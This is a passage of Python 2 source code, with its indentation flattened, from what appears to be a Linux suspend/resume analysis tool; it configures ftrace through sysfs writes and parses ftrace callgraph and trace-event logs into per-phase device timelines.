outT = open(self.rtcpath+'/time', 'r').read().strip()
mD = re.match('^(?P<y>[0-9]*)-(?P<m>[0-9]*)-(?P<d>[0-9]*)', outD)
mT = re.match('^(?P<h>[0-9]*):(?P<m>[0-9]*):(?P<s>[0-9]*)', outT)
if(mD and mT):
# get the current time from hardware
utcoffset = int((datetime.now() - datetime.utcnow()).total_seconds())
dt = datetime(\
int(mD.group('y')), int(mD.group('m')), int(mD.group('d')),
int(mT.group('h')), int(mT.group('m')), int(mT.group('s')))
nowtime = int(dt.strftime('%s')) + utcoffset
else:
# if hardware time fails, use the software time
nowtime = int(datetime.now().strftime('%s'))
alarm = nowtime + self.rtcwaketime
os.system('echo %d > %s/wakealarm' % (alarm, self.rtcpath))
sysvals = SystemValues()
# Class: DeviceNode
# Description:
# A container used to create a device hierarchy, with a single root node
# and a tree of child nodes. Used by Data.deviceTopology()
class DeviceNode:
name = ''
children = 0
depth = 0
def __init__(self, nodename, nodedepth):
self.name = nodename
self.children = []
self.depth = nodedepth
# Class: Data
# Description:
# The primary container for suspend/resume test data. There is one for
# each test run. The data is organized into a chronological hierarchy:
# Data.dmesg {
# root structure, started as dmesg & ftrace, but now only ftrace
# contents: times for suspend start/end, resume start/end, fwdata
# phases {
# 10 sequential, non-overlapping phases of S/R
# contents: times for phase start/end, order/color data for html
# devlist {
# device callback or action list for this phase
# device {
# a single device callback or generic action
# contents: start/stop times, pid/cpu/driver info
# parents/children, html id for timeline/callgraph
# optionally includes an ftrace callgraph
# optionally includes intradev trace events
# }
# }
# }
# }
#
class Data:
dmesg = {} # root data structure
phases = [] # ordered list of phases
start = 0.0 # test start
end = 0.0 # test end
tSuspended = 0.0 # low-level suspend start
tResumed = 0.0 # low-level resume start
tLow = 0.0 # time spent in low-level suspend (standby/freeze)
fwValid = False # is firmware data available
fwSuspend = 0 # time spent in firmware suspend
fwResume = 0 # time spent in firmware resume
dmesgtext = [] # dmesg text file in memory
testnumber = 0
idstr = ''
html_device_id = 0
stamp = 0
outfile = ''
def __init__(self, num):
idchar = 'abcdefghijklmnopqrstuvwxyz'
self.testnumber = num
self.idstr = idchar[num]
self.dmesgtext = []
self.phases = []
self.dmesg = { # fixed list of 10 phases
'suspend_prepare': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#CCFFCC', 'order': 0},
'suspend': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#88FF88', 'order': 1},
'suspend_late': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#00AA00', 'order': 2},
'suspend_noirq': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#008888', 'order': 3},
'suspend_machine': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#0000FF', 'order': 4},
'resume_machine': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#FF0000', 'order': 5},
'resume_noirq': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#FF9900', 'order': 6},
'resume_early': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#FFCC00', 'order': 7},
'resume': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#FFFF88', 'order': 8},
'resume_complete': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#FFFFCC', 'order': 9}
}
self.phases = self.sortedPhases()
def getStart(self):
return self.dmesg[self.phases[0]]['start']
def setStart(self, time):
self.start = time
self.dmesg[self.phases[0]]['start'] = time
def getEnd(self):
return self.dmesg[self.phases[-1]]['end']
def setEnd(self, time):
self.end = time
self.dmesg[self.phases[-1]]['end'] = time
def isTraceEventOutsideDeviceCalls(self, pid, time):
for phase in self.phases:
list = self.dmesg[phase]['list']
for dev in list:
d = list[dev]
if(d['pid'] == pid and time >= d['start'] and
time <= d['end']):
return False
return True
def addIntraDevTraceEvent(self, action, name, pid, time):
if(action == 'mutex_lock_try'):
color = 'red'
elif(action == 'mutex_lock_pass'):
color = 'green'
elif(action == 'mutex_unlock'):
color = 'blue'
else:
# create separate colors based on the name
v1 = len(name)*10 % 256
v2 = string.count(name, 'e')*100 % 256
v3 = ord(name[0])*20 % 256
color = '#%06X' % ((v1*0x10000) + (v2*0x100) + v3)
for phase in self.phases:
list = self.dmesg[phase]['list']
for dev in list:
d = list[dev]
if(d['pid'] == pid and time >= d['start'] and
time <= d['end']):
e = TraceEvent(action, name, color, time)
if('traceevents' not in d):
d['traceevents'] = []
d['traceevents'].append(e)
return d
break
return 0
def capIntraDevTraceEvent(self, action, name, pid, time):
for phase in self.phases:
list = self.dmesg[phase]['list']
for dev in list:
d = list[dev]
if(d['pid'] == pid and time >= d['start'] and
time <= d['end']):
if('traceevents' not in d):
return
for e in d['traceevents']:
if(e.action == action and
e.name == name and not e.ready):
e.length = time - e.time
e.ready = True
break
return
def trimTimeVal(self, t, t0, dT, left):
if left:
if(t > t0):
if(t - dT < t0):
return t0
return t - dT
else:
return t
else:
if(t < t0 + dT):
if(t > t0):
return t0 + dT
return t + dT
else:
return t
def trimTime(self, t0, dT, left):
self.tSuspended = self.trimTimeVal(self.tSuspended, t0, dT, left)
self.tResumed = self.trimTimeVal(self.tResumed, t0, dT, left)
self.start = self.trimTimeVal(self.start, t0, dT, left)
self.end = self.trimTimeVal(self.end, t0, dT, left)
for phase in self.phases:
p = self.dmesg[phase]
p['start'] = self.trimTimeVal(p['start'], t0, dT, left)
p['end'] = self.trimTimeVal(p['end'], t0, dT, left)
list = p['list']
for name in list:
d = list[name]
d['start'] = self.trimTimeVal(d['start'], t0, dT, left)
d['end'] = self.trimTimeVal(d['end'], t0, dT, left)
if('ftrace' in d):
cg = d['ftrace']
cg.start = self.trimTimeVal(cg.start, t0, dT, left)
cg.end = self.trimTimeVal(cg.end, t0, dT, left)
for line in cg.list:
line.time = self.trimTimeVal(line.time, t0, dT, left)
if('traceevents' in d):
for e in d['traceevents']:
e.time = self.trimTimeVal(e.time, t0, dT, left)
def normalizeTime(self, tZero):
# first trim out any standby or freeze clock time
if(self.tSuspended != self.tResumed):
if(self.tResumed > tZero):
self.trimTime(self.tSuspended, \
self.tResumed-self.tSuspended, True)
else:
self.trimTime(self.tSuspended, \
self.tResumed-self.tSuspended, False)
# shift the timeline so that tZero is the new 0
self.tSuspended -= tZero
self.tResumed -= tZero
self.start -= tZero
self.end -= tZero
for phase in self.phases:
p = self.dmesg[phase]
p['start'] -= tZero
p['end'] -= tZero
list = p['list']
for name in list:
d = list[name]
d['start'] -= tZero
d['end'] -= tZero
if('ftrace' in d):
cg = d['ftrace']
cg.start -= tZero
cg.end -= tZero
for line in cg.list:
line.time -= tZero
if('traceevents' in d):
for e in d['traceevents']:
e.time -= tZero
def newPhaseWithSingleAction(self, phasename, devname, start, end, color):
for phase in self.phases:
self.dmesg[phase]['order'] += 1
self.html_device_id += 1
devid = '%s%d' % (self.idstr, self.html_device_id)
list = dict()
list[devname] = \
{'start': start, 'end': end, 'pid': 0, 'par': '',
'length': (end-start), 'row': 0, 'id': devid, 'drv': '' };
self.dmesg[phasename] = \
{'list': list, 'start': start, 'end': end,
'row': 0, 'color': color, 'order': 0}
self.phases = self.sortedPhases()
def newPhase(self, phasename, start, end, color, order):
if(order < 0):
order = len(self.phases)
for phase in self.phases[order:]:
self.dmesg[phase]['order'] += 1
if(order > 0):
p = self.phases[order-1]
self.dmesg[p]['end'] = start
if(order < len(self.phases)):
p = self.phases[order]
self.dmesg[p]['start'] = end
list = dict()
self.dmesg[phasename] = \
{'list': list, 'start': start, 'end': end,
'row': 0, 'color': color, 'order': order}
self.phases = self.sortedPhases()
def setPhase(self, phase, ktime, isbegin):
if(isbegin):
self.dmesg[phase]['start'] = ktime
else:
self.dmesg[phase]['end'] = ktime
def dmesgSortVal(self, phase):
return self.dmesg[phase]['order']
def sortedPhases(self):
return sorted(self.dmesg, key=self.dmesgSortVal)
def sortedDevices(self, phase):
list = self.dmesg[phase]['list']
slist = []
tmp = dict()
for devname in list:
dev = list[devname]
tmp[dev['start']] = devname
for t in sorted(tmp):
slist.append(tmp[t])
return slist
def fixupInitcalls(self, phase, end):
# if any calls never returned, clip them at system resume end
phaselist = self.dmesg[phase]['list']
for devname in phaselist:
dev = phaselist[devname]
if(dev['end'] < 0):
dev['end'] = end
vprint("%s (%s): callback didn't return" % (devname, phase))
def deviceFilter(self, devicefilter):
# remove everything but the relatives of the filter devnames
filter = []
for phase in self.phases:
list = self.dmesg[phase]['list']
for name in devicefilter:
dev = name
while(dev in list):
if(dev not in filter):
filter.append(dev)
dev = list[dev]['par']
children = self.deviceDescendants(name, phase)
for dev in children:
if(dev not in filter):
filter.append(dev)
for phase in self.phases:
list = self.dmesg[phase]['list']
rmlist = []
for name in list:
pid = list[name]['pid']
if(name not in filter and pid >= 0):
rmlist.append(name)
for name in rmlist:
del list[name]
def fixupInitcallsThatDidntReturn(self):
# if any calls never returned, clip them at system resume end
for phase in self.phases:
self.fixupInitcalls(phase, self.getEnd())
def newActionGlobal(self, name, start, end):
# which phase is this device callback or action "in"
targetphase = "none"
overlap = 0.0
for phase in self.phases:
pstart = self.dmesg[phase]['start']
pend = self.dmesg[phase]['end']
o = max(0, min(end, pend) - max(start, pstart))
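# e.g. phase (2.0, 5.0) vs action (4.0, 7.0): o = min(7.0, 5.0) - max(4.0, 2.0) = 1.0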
if(o > overlap):
targetphase = phase
overlap = o
if targetphase in self.phases:
self.newAction(targetphase, name, -1, '', start, end, '')
return True
return False
def newAction(self, phase, name, pid, parent, start, end, drv):
# new device callback for a specific phase
self.html_device_id += 1
devid = '%s%d' % (self.idstr, self.html_device_id)
list = self.dmesg[phase]['list']
length = -1.0
if(start >= 0 and end >= 0):
length = end - start
list[name] = {'start': start, 'end': end, 'pid': pid, 'par': parent,
'length': length, 'row': 0, 'id': devid, 'drv': drv }
def deviceIDs(self, devlist, phase):
idlist = []
list = self.dmesg[phase]['list']
for devname in list:
if devname in devlist:
idlist.append(list[devname]['id'])
return idlist
def deviceParentID(self, devname, phase):
pdev = ''
pdevid = ''
list = self.dmesg[phase]['list']
if devname in list:
pdev = list[devname]['par']
if pdev in list:
return list[pdev]['id']
return pdev
def deviceChildren(self, devname, phase):
devlist = []
list = self.dmesg[phase]['list']
for child in list:
if(list[child]['par'] == devname):
devlist.append(child)
return devlist
def deviceDescendants(self, devname, phase):
children = self.deviceChildren(devname, phase)
family = children
for child in children:
family += self.deviceDescendants(child, phase)
return family
def deviceChildrenIDs(self, devname, phase):
devlist = self.deviceChildren(devname, phase)
return self.deviceIDs(devlist, phase)
def printDetails(self):
vprint(' test start: %f' % self.start)
for phase in self.phases:
dc = len(self.dmesg[phase]['list'])
vprint(' %16s: %f - %f (%d devices)' % (phase, \
self.dmesg[phase]['start'], self.dmesg[phase]['end'], dc))
vprint(' test end: %f' % self.end)
def masterTopology(self, name, list, depth):
node = DeviceNode(name, depth)
for cname in list:
clist = self.deviceChildren(cname, 'resume')
cnode = self.masterTopology(cname, clist, depth+1)
node.children.append(cnode)
return node
def printTopology(self, node):
html = ''
if node.name:
info = ''
drv = ''
for phase in self.phases:
list = self.dmesg[phase]['list']
if node.name in list:
s = list[node.name]['start']
e = list[node.name]['end']
if list[node.name]['drv']:
drv = ' {'+list[node.name]['drv']+'}'
info += ('<li>%s: %.3fms</li>' % (phase, (e-s)*1000))
html += '<li><b>'+node.name+drv+'</b>'
if info:
html += '<ul>'+info+'</ul>'
html += '</li>'
if len(node.children) > 0:
html += '<ul>'
for cnode in node.children:
html += self.printTopology(cnode)
html += '</ul>'
return html
def rootDeviceList(self):
# list of devices graphed
real = []
for phase in self.dmesg:
list = self.dmesg[phase]['list']
for dev in list:
if list[dev]['pid'] >= 0 and dev not in real:
real.append(dev)
# list of top-most root devices
rootlist = []
for phase in self.dmesg:
list = self.dmesg[phase]['list']
for dev in list:
pdev = list[dev]['par']
if(re.match('[0-9]*-[0-9]*\.[0-9]*[\.0-9]*\:[\.0-9]*$', pdev)):
continue
if pdev and pdev not in real and pdev not in rootlist:
rootlist.append(pdev)
return rootlist
def deviceTopology(self):
rootlist = self.rootDeviceList()
master = self.masterTopology('', rootlist, 0)
return self.printTopology(master)
# Class: TraceEvent
# Description:
# A container for trace event data found in the ftrace file
class TraceEvent:
ready = False
name = ''
time = 0.0
color = '#FFFFFF'
length = 0.0
action = ''
def __init__(self, a, n, c, t):
self.action = a
self.name = n
self.color = c
self.time = t
# Class: FTraceLine
# Description:
# A container for a single line of ftrace data. There are six basic types:
# callgraph line:
# call: " dpm_run_callback() {"
# return: " }"
# leaf: " dpm_run_callback();"
# trace event:
# tracing_mark_write: SUSPEND START or RESUME COMPLETE
# suspend_resume: phase or custom exec block data
# device_pm_callback: device callback info
class FTraceLine:
time = 0.0
length = 0.0
fcall = False
freturn = False
fevent = False
depth = 0
name = ''
type = ''
def __init__(self, t, m, d):
self.time = float(t)
# is this a trace event
if(d == 'traceevent' or re.match('^ *\/\* *(?P<msg>.*) \*\/ *$', m)):
if(d == 'traceevent'):
# nop format trace event
msg = m
else:
# function_graph format trace event
em = re.match('^ *\/\* *(?P<msg>.*) \*\/ *$', m)
msg = em.group('msg')
emm = re.match('^(?P<call>.*?): (?P<msg>.*)', msg)
if(emm):
self.name = emm.group('msg')
self.type = emm.group('call')
else:
self.name = msg
self.fevent = True
return
# convert the duration to seconds
if(d):
self.length = float(d)/1000000
# the indentation determines the depth
match = re.match('^(?P<d> *)(?P<o>.*)$', m)
if(not match):
return
self.depth = self.getDepth(match.group('d'))
m = match.group('o')
# function return
if(m[0] == '}'):
self.freturn = True
if(len(m) > 1):
# includes comment with function name
match = re.match('^} *\/\* *(?P<n>.*) *\*\/$', m)
if(match):
self.name = match.group('n')
# function call
else:
self.fcall = True
# function call with children
if(m[-1] == '{'):
match = re.match('^(?P<n>.*) *\(.*', m)
if(match):
self.name = match.group('n')
# function call with no children (leaf)
elif(m[-1] == ';'):
self.freturn = True
match = re.match('^(?P<n>.*) *\(.*', m)
if(match):
self.name = match.group('n')
# something else (possibly a trace marker)
else:
self.name = m
def getDepth(self, str):
return len(str)/2
def debugPrint(self, dev):
if(self.freturn and self.fcall):
print('%s -- %f (%02d): %s(); (%.3f us)' % (dev, self.time, \
self.depth, self.name, self.length*1000000))
elif(self.freturn):
print('%s -- %f (%02d): %s} (%.3f us)' % (dev, self.time, \
self.depth, self.name, self.length*1000000))
else:
print('%s -- %f (%02d): %s() { (%.3f us)' % (dev, self.time, \
self.depth, self.name, self.length*1000000))
# Class: FTraceCallGraph
# Description:
# A container for the ftrace callgraph of a single recursive function.
# This can be a dpm_run_callback, dpm_prepare, or dpm_complete callgraph
# Each instance is tied to a single device in a single phase, and is
# comprised of an ordered list of FTraceLine objects
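# addLine() returns True once a callgraph is complete (a function return
# brings the depth back to 0), signaling the caller to start a new graph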
class FTraceCallGraph:
start = -1.0
end = -1.0
list = []
invalid = False
depth = 0
def __init__(self):
self.start = -1.0
self.end = -1.0
self.list = []
self.depth = 0
def setDepth(self, line):
if(line.fcall and not line.freturn):
line.depth = self.depth
self.depth += 1
elif(line.freturn and not line.fcall):
self.depth -= 1
line.depth = self.depth
else:
line.depth = self.depth
def addLine(self, line, match):
if(not self.invalid):
self.setDepth(line)
if(line.depth == 0 and line.freturn):
if(self.start < 0):
self.start = line.time
self.end = line.time
self.list.append(line)
return True
if(self.invalid):
return False
if(len(self.list) >= 1000000 or self.depth < 0):
if(len(self.list) > 0):
first = self.list[0]
self.list = []
self.list.append(first)
self.invalid = True
if(not match):
return False
id = 'task %s cpu %s' % (match.group('pid'), match.group('cpu'))
window = '(%f - %f)' % (self.start, line.time)
if(self.depth < 0):
print('Too much data for '+id+\
' (buffer overflow), ignoring this callback')
else:
print('Too much data for '+id+\
' '+window+', ignoring this callback')
return False
self.list.append(line)
if(self.start < 0):
self.start = line.time
return False
def slice(self, t0, tN):
minicg = FTraceCallGraph()
count = -1
firstdepth = 0
for l in self.list:
if(l.time < t0 or l.time > tN):
continue
if(count < 0):
if(not l.fcall or l.name == 'dev_driver_string'):
continue
firstdepth = l.depth
count = 0
l.depth -= firstdepth
minicg.addLine(l, 0)
if((count == 0 and l.freturn and l.fcall) or
(count > 0 and l.depth <= 0)):
break
count += 1
return minicg
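# sanityCheck verifies the callgraph is balanced: every call at a given depth
# needs a matching return, whose measured length is copied back onto the call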
def sanityCheck(self):
stack = dict()
cnt = 0
for l in self.list:
if(l.fcall and not l.freturn):
stack[l.depth] = l
cnt += 1
elif(l.freturn and not l.fcall):
if(l.depth not in stack):
return False
stack[l.depth].length = l.length
stack[l.depth] = 0
l.length = 0
cnt -= 1
if(cnt == 0):
return True
return False
def debugPrint(self, filename):
if(filename == 'stdout'):
print('[%f - %f]' % (self.start, self.end))
for l in self.list:
if(l.freturn and l.fcall):
print('%f (%02d): %s(); (%.3f us)' % (l.time, \
l.depth, l.name, l.length*1000000))
elif(l.freturn):
print('%f (%02d): %s} (%.3f us)' % (l.time, \
l.depth, l.name, l.length*1000000))
else:
print('%f (%02d): %s() { (%.3f us)' % (l.time, \
l.depth, l.name, l.length*1000000))
print(' ')
else:
fp = open(filename, 'w')
print(filename)
for l in self.list:
if(l.freturn and l.fcall):
fp.write('%f (%02d): %s(); (%.3f us)\n' % (l.time, \
l.depth, l.name, l.length*1000000))
elif(l.freturn):
fp.write('%f (%02d): %s} (%.3f us)\n' % (l.time, \
l.depth, l.name, l.length*1000000))
else:
fp.write('%f (%02d): %s() { (%.3f us)\n' % (l.time, \
l.depth, l.name, l.length*1000000))
fp.close()
# Class: Timeline
# Description:
# A container for a suspend/resume html timeline. In older versions
# of the script there were multiple timelines, but in the latest
# there is only one.
class Timeline:
html = {}
scaleH = 0.0 # height of the timescale row as a percent of the timeline height
rowH = 0.0 # height of each device row as a percent of the timeline height
row_height_pixels = 30
maxrows = 0
height = 0
def __init__(self):
self.html = {
'timeline': '',
'legend': '',
'scale': ''
}
def setRows(self, rows):
self.maxrows = int(rows)
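# the timescale header occupies one row's worth of height (scaleH); the
# remaining percentage is split evenly among the device rows (rowH)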
self.scaleH = 100.0/float(self.maxrows)
self.height = self.maxrows*self.row_height_pixels
r = float(self.maxrows - 1)
if(r < 1.0):
r = 1.0
self.rowH = (100.0 - self.scaleH)/r
# Class: TestRun
# Description:
# A container for a suspend/resume test run. This is necessary as
# there could be more than one, and they need to be separate.
class TestRun:
ftrace_line_fmt_fg = \
'^ *(?P<time>[0-9\.]*) *\| *(?P<cpu>[0-9]*)\)'+\
' *(?P<proc>.*)-(?P<pid>[0-9]*) *\|'+\
'[ +!]*(?P<dur>[0-9\.]*) .*\| (?P<msg>.*)'
ftrace_line_fmt_nop = \
' *(?P<proc>.*)-(?P<pid>[0-9]*) *\[(?P<cpu>[0-9]*)\] *'+\
'(?P<flags>.{4}) *(?P<time>[0-9\.]*): *'+\
'(?P<msg>.*)'
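# illustrative (made-up) examples of lines each format is meant to match:
# fg: ' 2345.678901 |   0)  kworker-137   |   1.234 us |  dpm_run_callback();'
# nop: ' kworker-137   [000] d..2  2345.678901: suspend_resume: machine_suspend[1] begin'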
ftrace_line_fmt = ftrace_line_fmt_nop
cgformat = False
ftemp = dict()
ttemp = dict()
inthepipe = False
tracertype = ''
data = 0
def __init__(self, dataobj):
self.data = dataobj
self.ftemp = dict()
self.ttemp = dict()
def isReady(self):
if(self.tracertype == '' or not self.data):
return False
return True
def setTracerType(self, tracer):
self.tracertype = tracer
if(tracer == 'function_graph'):
self.cgformat = True
self.ftrace_line_fmt = self.ftrace_line_fmt_fg
elif(tracer == 'nop'):
self.ftrace_line_fmt = self.ftrace_line_fmt_nop
else:
doError('Invalid tracer format: [%s]' % tracer, False)
# ----------------- FUNCTIONS --------------------
# Function: vprint
# Description:
# verbose print (prints only with -verbose option)
# Arguments:
# msg: the debug/log message to print
def vprint(msg):
global sysvals
if(sysvals.verbose):
print(msg)
# Function: initFtrace
# Description:
# Configure ftrace to use trace events and/or a callgraph
def initFtrace():
global sysvals
tp = sysvals.tpath
cf = 'dpm_run_callback'
if(sysvals.usetraceeventsonly):
cf = '-e dpm_prepare -e dpm_complete -e dpm_run_callback'
if(sysvals.usecallgraph or sysvals.usetraceevents):
print('INITIALIZING FTRACE...')
# turn trace off
os.system('echo 0 > '+tp+'tracing_on')
# set the trace clock to global
os.system('echo global > '+tp+'trace_clock')
# set trace buffer to a huge value
os.system('echo nop > '+tp+'current_tracer')
os.system('echo 100000 > '+tp+'buffer_size_kb')
# initialize the callgraph trace, unless this is an x2 run
if(sysvals.usecallgraph and sysvals.execcount == 1):
# set trace type
os.system('echo function_graph > '+tp+'current_tracer')
os.system('echo "" > '+tp+'set_ftrace_filter')
# set trace format options
os.system('echo funcgraph-abstime > '+tp+'trace_options')
os.system('echo funcgraph-proc > '+tp+'trace_options')
# focus only on device suspend and resume
os.system('cat '+tp+'available_filter_functions | grep '+\
cf+' > '+tp+'set_graph_function')
if(sysvals.usetraceevents):
# turn trace events on
events = iter(sysvals.traceevents)
for e in events:
os.system('echo 1 > '+sysvals.epath+e+'/enable')
# clear the trace buffer
os.system('echo "" > '+tp+'trace')
# Function: initFtraceAndroid
# Description:
# Configure ftrace to capture trace events
def initFtraceAndroid():
global sysvals
tp = sysvals.tpath
if(sysvals.usetraceevents):
print('INITIALIZING FTRACE...')
# turn trace off
os.system(sysvals.adb+" shell 'echo 0 > "+tp+"tracing_on'")
# set the trace clock to global
os.system(sysvals.adb+" shell 'echo global > "+tp+"trace_clock'")
# set trace buffer to a huge value
os.system(sysvals.adb+" shell 'echo nop > "+tp+"current_tracer'")
os.system(sysvals.adb+" shell 'echo 10000 > "+tp+"buffer_size_kb'")
# turn trace events on
events = iter(sysvals.traceevents)
for e in events:
os.system(sysvals.adb+" shell 'echo 1 > "+\
sysvals.epath+e+"/enable'")
# clear the trace buffer
os.system(sysvals.adb+" shell 'echo \"\" > "+tp+"trace'")
# Function: verifyFtrace
# Description:
# Check that ftrace is working on the system
# Output:
# True or False
def verifyFtrace():
global sysvals
# files needed for any trace data
files = ['buffer_size_kb', 'current_tracer', 'trace', 'trace_clock',
'trace_marker', 'trace_options', 'tracing_on']
# files needed for callgraph trace data
tp = sysvals.tpath
if(sysvals.usecallgraph):
files += [
'available_filter_functions',
'set_ftrace_filter',
'set_graph_function'
]
for f in files:
if(sysvals.android):
out = os.popen(sysvals.adb+' shell ls '+tp+f).read().strip()
if(out != tp+f):
return False
else:
if(os.path.exists(tp+f) == False):
return False
return True
# Function: parseStamp
# Description:
# Pull in the stamp comment line from the data file(s),
# create the stamp, and add it to the global sysvals object
# Arguments:
# m: the valid re.match output for the stamp line
def parseStamp(m, data):
global sysvals
data.stamp = {'time': '', 'host': '', 'mode': ''}
dt = datetime(int(m.group('y'))+2000, int(m.group('m')),
int(m.group('d')), int(m.group('H')), int(m.group('M')),
int(m.group('S')))
data.stamp['time'] = dt.strftime('%B %d %Y, %I:%M:%S %p')
data.stamp['host'] = m.group('host')
data.stamp['mode'] = m.group('mode')
data.stamp['kernel'] = m.group('kernel')
sysvals.suspendmode = data.stamp['mode']
if not sysvals.stamp:
sysvals.stamp = data.stamp
# Function: diffStamp
# Description:
# compare the host, kernel, and mode fields of two stamps
# Arguments:
#	 stamp1: stamp dict with host, kernel, and mode fields
#	 stamp2: stamp dict with host, kernel, and mode fields
# Return:
# True if stamps differ, False if they're the same
def diffStamp(stamp1, stamp2):
if 'host' in stamp1 and 'host' in stamp2:
if stamp1['host'] != stamp2['host']:
return True
if 'kernel' in stamp1 and 'kernel' in stamp2:
if stamp1['kernel'] != stamp2['kernel']:
return True
if 'mode' in stamp1 and 'mode' in stamp2:
if stamp1['mode'] != stamp2['mode']:
return True
return False
# Function: doesTraceLogHaveTraceEvents
# Description:
# Quickly determine if the ftrace log has some or all of the trace events
# required for primary parsing. Set the usetraceevents and/or
# usetraceeventsonly flags in the global sysvals object
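# (usetraceeventsonly remains True only if every event in sysvals.traceevents
# appears in the log; usetraceevents is set once suspend_resume is found)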
def doesTraceLogHaveTraceEvents():
global sysvals
sysvals.usetraceeventsonly = True
sysvals.usetraceevents = False
for e in sysvals.traceevents:
out = os.popen('cat '+sysvals.ftracefile+' | grep "'+e+': "').read()
if(not out):
sysvals.usetraceeventsonly = False
if(e == 'suspend_resume' and out):
sysvals.usetraceevents = True
# Function: appendIncompleteTraceLog
# Description:
# [deprecated for kernel 3.15 or newer]
# Legacy support of ftrace outputs that lack the device_pm_callback
# and/or suspend_resume trace events. The primary data should be
# taken from dmesg, and this ftrace is used only for callgraph data
# or custom actions in the timeline. The data is appended to the Data
# objects provided.
# Arguments:
# testruns: the array of Data objects obtained from parseKernelLog
def appendIncompleteTraceLog(testruns):
global sysvals
# create TestRun vessels for ftrace parsing
testcnt = len(testruns)
testidx = -1
testrun = []
for data in testruns:
testrun.append(TestRun(data))
# extract the callgraph and traceevent data
vprint('Analyzing the ftrace data...')
tf = open(sysvals.ftracefile, 'r')
for line in tf:
# remove any latent carriage returns
line = line.replace('\r\n', '')
# grab the time stamp first (signifies the start of the test run)
m = re.match(sysvals.stampfmt, line)
if(m):
testidx += 1
parseStamp(m, testrun[testidx].data)
continue
# pull out any firmware data
if(re.match(sysvals.firmwarefmt, line)):
continue
# if we haven't found a test time stamp yet, keep scanning until we do
if(testidx < 0):
continue
# determine the trace data type (required for further parsing)
m = re.match(sysvals.tracertypefmt, line)
if(m):
tracer = m.group('t')
testrun[testidx].setTracerType(tracer)
continue
# parse only valid lines; if this isn't one, move on
m = re.match(testrun[testidx].ftrace_line_fmt, line)
if(not m):
continue
# gather the basic message data from the line
m_time = m.group('time')
m_pid = m.group('pid')
m_msg = m.group('msg')
if(testrun[testidx].cgformat):
m_param3 = m.group('dur')
else:
m_param3 = 'traceevent'
if(m_time and m_pid and m_msg):
t = FTraceLine(m_time, m_msg, m_param3)
pid = int(m_pid)
else:
continue
# the line should be a call, return, or event
if(not t.fcall and not t.freturn and not t.fevent):
continue
# only parse the ftrace data during suspend/resume
data = testrun[testidx].data
if(not testrun[testidx].inthepipe):
# look for the suspend start marker
if(t.fevent):
if(t.name == 'SUSPEND START'):
testrun[testidx].inthepipe = True
data.setStart(t.time)
continue
else:
# trace event processing
if(t.fevent):
if(t.name == 'RESUME COMPLETE'):
testrun[testidx].inthepipe = False
data.setEnd(t.time)
if(testidx == testcnt - 1):
break
continue
# general trace events have two types, begin and end
if(re.match('(?P<name>.*) begin$', t.name)):
isbegin = True
elif(re.match('(?P<name>.*) end$', t.name)):
isbegin = False
else:
continue
m = re.match('(?P<name>.*)\[(?P<val>[0-9]*)\] .*', t.name)
if(m):
val = m.group('val')
if val == '0':
name = m.group('name')
else:
name = m.group('name')+'['+val+']'
else:
m = re.match('(?P<name>.*) .*', t.name)
name = m.group('name')
# special processing for trace events
if re.match('dpm_prepare\[.*', name):
continue
elif re.match('machine_suspend.*', name):
continue
elif re.match('suspend_enter\[.*', name):
if(not isbegin):
data.dmesg['suspend_prepare']['end'] = t.time
continue
elif re.match('dpm_suspend\[.*', name):
if(not isbegin):
data.dmesg['suspend']['end'] = t.time
continue
elif re.match('dpm_suspend_late\[.*', name):
if(isbegin):
data.dmesg['suspend_late']['start'] = t.time
else:
data.dmesg['suspend_late']['end'] = t.time
continue
elif re.match('dpm_suspend_noirq\[.*', name):
if(isbegin):
data.dmesg['suspend_noirq']['start'] = t.time
else:
data.dmesg['suspend_noirq']['end'] = t.time
continue
elif re.match('dpm_resume_noirq\[.*', name):
if(isbegin):
data.dmesg['resume_machine']['end'] = t.time
data.dmesg['resume_noirq']['start'] = t.time
else:
data.dmesg['resume_noirq']['end'] = t.time
continue
elif re.match('dpm_resume_early\[.*', name):
if(isbegin):
data.dmesg['resume_early']['start'] = t.time
else:
data.dmesg['resume_early']['end'] = t.time
continue
elif re.match('dpm_resume\[.*', name):
if(isbegin):
data.dmesg['resume']['start'] = t.time
else:
data.dmesg['resume']['end'] = t.time
continue
elif re.match('dpm_complete\[.*', name):
if(isbegin):
data.dmesg['resume_complete']['start'] = t.time
else:
data.dmesg['resume_complete']['end'] = t.time
continue
# is this trace event outside of the device calls?
if(data.isTraceEventOutsideDeviceCalls(pid, t.time)):
# global events (outside device calls) are simply graphed
if(isbegin):
# store each trace event in ttemp
if(name not in testrun[testidx].ttemp):
testrun[testidx].ttemp[name] = []
testrun[testidx].ttemp[name].append(\
{'begin': t.time, 'end': t.time})
else:
# finish off matching trace event in ttemp
if(name in testrun[testidx].ttemp):
testrun[testidx].ttemp[name][-1]['end'] = t.time
else:
if(isbegin):
data.addIntraDevTraceEvent('', name, pid, t.time)
else:
data.capIntraDevTraceEvent('', name, pid, t.time)
# call/return processing
elif sysvals.usecallgraph:
# create a callgraph object for the data
if(pid not in testrun[testidx].ftemp):
testrun[testidx].ftemp[pid] = []
testrun[testidx].ftemp[pid].append(FTraceCallGraph())
# when the call is finished, see which device matches it
cg = testrun[testidx].ftemp[pid][-1]
if(cg.addLine(t, m)):
testrun[testidx].ftemp[pid].append(FTraceCallGraph())
tf.close()
for test in testrun:
# add the traceevent data to the device hierarchy
if(sysvals.usetraceevents):
for name in test.ttemp:
for event in test.ttemp[name]:
begin = event['begin']
end = event['end']
# if event starts before timeline start, expand timeline
if(begin < test.data.start):
test.data.setStart(begin)
# if event ends after timeline end, expand the timeline
if(end > test.data.end):
test.data.setEnd(end)
test.data.newActionGlobal(name, begin, end)
# add the callgraph data to the device hierarchy
for pid in test.ftemp:
for cg in test.ftemp[pid]:
if(not cg.sanityCheck()):
id = 'task %s cpu %s' % (pid, m.group('cpu'))
vprint('Sanity check failed for '+\
id+', ignoring this callback')
continue
callstart = cg.start
callend = cg.end
